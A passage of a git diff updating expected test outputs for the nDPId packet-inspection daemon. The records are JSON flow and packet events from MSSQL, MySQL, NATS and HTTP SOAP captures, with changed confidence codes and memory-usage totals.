+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7580000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8339,"flow_avg_l4_payload_len":1191,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":14142,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":60,"global_ts_msec":1278068444666} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 @@ -66,9 +66,9 @@ ~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5921038 bytes -~~ total memory freed........: 5921038 bytes -~~ total allocations/frees...: 118203/118203 +~~ total memory allocated....: 6017887 bytes +~~ total memory freed........: 6017887 bytes +~~ total allocations/frees...: 120959/120959 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2417 chars diff --git a/test/results/mysql-8.pcap.out b/test/results/mysql-8.pcap.out index 8748c5124..544715fab 100644 --- a/test/results/mysql-8.pcap.out +++ b/test/results/mysql-8.pcap.out 
@@ -4,8 +4,8 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946708780103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA8OA9AAEAGI6zAqAFpCioSxiIiDOqSBUElAAAAAKACchDH0wAAAgQFtAQCCAoAA3kqAAAAAAEDAwY="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946708780103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946708780103,"pkt":"REREREREIiIiIiIiCABFAAA8AABAAD8GXLsKKhLGwKgBaQzqIiISTcRTkgVBJqAScSDgsQAAAgQFtAQCCAoAARFeAAN5KgEDAwc="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946708780103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946708780103,"pkt":"IiIiIiIiRERERERECABFAAA0OBBAAEAGI7PAqAFpCioSxiIiDOqSBUEmEk3EVIAQAcl+1QAAAQEICgADeSoAARFe"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946708780103,"flow_last_seen":946708780104,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":87,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":946708780104,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"10.42.18.198","src_port":8738,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"mysql-8.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":87,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":946708780104} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869559 bytes -~~ total memory freed........: 5869559 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003193 bytes +~~ total memory freed........: 6003193 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 680 chars diff --git a/test/results/nats.pcap.out b/test/results/nats.pcap.out index 856c4e388..52a205caa 100644 --- a/test/results/nats.pcap.out 
+++ b/test/results/nats.pcap.out 
@@ -4,14 +4,14 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1586288040558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzTwAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iAAAAAAQCAAA="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1586288040558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJA7LPw3wic09sBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5iNpSeYgQCAAA="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1586288040558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040558,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iQQfvCJzT0Oyz8OgBAx1\/4oAAABAQgKNpSeYjaUnmI="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040558,"flow_last_seen":1586288040566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1586288040575,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1586288040575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0kAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5xAAAAAAQCAAA="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABEH7WJfixMBXQ63dKsBL\/\/\/40AAACBD\/YAQMDBQEBCAo2lJ5yNpSecQQCAAA="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1586288040575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1586288040575,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAB1iUQftDrd0r4sTAWgBAx1\/4oAAABAQgKNpSecjaUnnI="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 
-00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1586288040575,"flow_last_seen":1586288040577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1586288040577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 
+00666{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1586288040558,"flow_last_seen":1586288040570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54820,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1586288040575,"flow_last_seen":1586288042776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1586288042776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54821,"dst_port":4222,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nats","breed":"Acceptable","category":"RPC"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"nats.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":912,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1586288042776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 
@@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875382 bytes -~~ total memory freed........: 5875382 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6009016 bytes +~~ total memory freed........: 6009016 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 455 chars ~~ json string max len.......: 672 chars diff --git a/test/results/ndpi_match_string_subprotocol__error.pcapng.out b/test/results/ndpi_match_string_subprotocol__error.pcapng.out index b5b87953d..08137a331 100644 --- a/test/results/ndpi_match_string_subprotocol__error.pcapng.out +++ b/test/results/ndpi_match_string_subprotocol__error.pcapng.out 
@@ -3,10 +3,10 @@ 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1258162014557,"flow_last_seen":1258162014557,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1258162014557,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1258162014557,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1258162014557,"pkt":"AFBWmXinAB9to6gACABFAAA0MZpAADwGZloKAwkTCkSJdp64H5sCrVC3AAAAAIACwej09wAAAgQFZAEDAwABAQQC"} 01989{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1258162014576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1180,"pkt_l4_len":1146,"thread_ts_msec":1258162014576,"pkt":"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"} 
-01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ndpi_match_string_subprotocol__error.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1258162014557,"flow_last_seen":1258162014576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1126,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1258162014576,"l3_proto":"ip4","src_ip":"10.3.9.19","dst_ip":"10.68.137.118","src_port":40632,"dst_port":8091,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 
{"6":"DPI"},"proto":"HTTP.SOAP","breed":"Acceptable","category":"RPC"},"http": {"hostname":"10.68.137.118","url":"10.68.137.118:8091\/Apcn\/ApcRemoteService","code":0,"content_type":"","user_agent":"Jakarta Commons-HttpClient\/3.0.1"}} 